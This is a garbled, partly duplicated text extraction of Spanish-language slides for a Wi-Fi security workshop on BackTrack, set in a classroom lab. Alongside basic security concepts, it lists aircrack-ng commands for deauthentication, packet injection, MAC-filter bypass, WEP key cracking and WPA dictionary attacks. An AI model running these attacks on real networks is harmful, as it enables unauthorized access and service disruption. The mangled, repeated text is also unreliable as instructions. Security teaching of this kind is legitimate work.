httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594
I- Conceptos de Seguridad
bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)
bull Se pretende tener ndash Confidencialidad
ndash Integridad
ndash Disponibilidad
bull Datos en proceso almacenados o en traacutensito
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694
Riesgo
bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida
bull El riesgo no se elimina
ndash
Aceptar el Riesgo ndash Minimizar el Riesgo
ndash Transferir el Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794
Amenaza
bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u
organizacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694
Riesgo
bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida
bull El riesgo no se elimina
ndash
Aceptar el Riesgo ndash Minimizar el Riesgo
ndash Transferir el Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794
Amenaza
bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u
organizacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
